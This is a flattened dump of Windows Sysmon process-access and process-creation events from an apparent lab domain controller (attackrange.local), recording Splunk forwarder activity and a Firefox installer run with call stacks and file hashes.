13:59:48.021{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.021{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9454-6005-2805-00000000A301}6608C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.021{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9454-6005-2805-00000000A301}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.021{59A5CD1D-9454-6005-2805-00000000A301}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-940F-6005-0C05-00000000A301}64766580C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141977|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+32707|C:\Windows\SYSTEM32\IEFRAME.dll+12e23a|C:\Windows\SYSTEM32\IEFRAME.dll+125302|C:\Windows\SYSTEM32\IEFRAME.dll+124d40|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-940F-6005-0C05-00000000A301}64766580C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1418e2|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+32707|C:\Windows\SYSTEM32\IEFRAME.dll+12e23a|C:\Windows\SYSTEM32\IEFRAME.dll+125302|C:\Windows\SYSTEM32\IEFRAME.dll+124d40|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-940F-6005-0C05-00000000A301}64766580C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+32707|C:\Windows\SYSTEM32\IEFRAME.dll+12e23a|C:\Windows\SYSTEM32\IEFRAME.dll+125302|C:\Windows\SYSTEM32\IEFRAME.dll+124d40|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-940F-6005-0C05-00000000A301}64766580C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+32707|C:\Windows\SYSTEM32\IEFRAME.dll+12e23a|C:\Windows\SYSTEM32\IEFRAME.dll+125302|C:\Windows\SYSTEM32\IEFRAME.dll+124d40|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9455-6005-2A05-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:49.739{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:49.739{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9455-6005-2A05-00000000A301}3180C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9455-6005-2A05-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.740{59A5CD1D-9455-6005-2A05-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:51.974{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:51.974{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:51.161{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:51.068{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:51.068{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:51.068{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:51.068{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:51.068{59A5CD1D-9451-6005-2405-00000000A301}63165224C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+159f0b(wow64)|C:\Windows\System32\KERNELBASE.dll+159bbc(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe+18fd0|C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe+1a0da|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 
154100x800000000000000014061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:51.068{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe84.0.2Firefox InstallerFirefoxMozilla Corporationsetup.exe.\setup.exe /LaunchedFromStub /INI=C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\config.iniC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=20B068D18C0C4B44221EAA28AFCB6B67,SHA256=12C2803AE3BB8A48FC423DB5F0F06414E7705C67B5F2AE50C2CBFAF2D55E92CC,IMPHASH=E2A592076B17EF8BFB48B7E03965A3FC{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe"C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe" /LaunchedFromStub /INI=C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\config.ini 10341000x800000000000000014060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:51.068{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.974{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 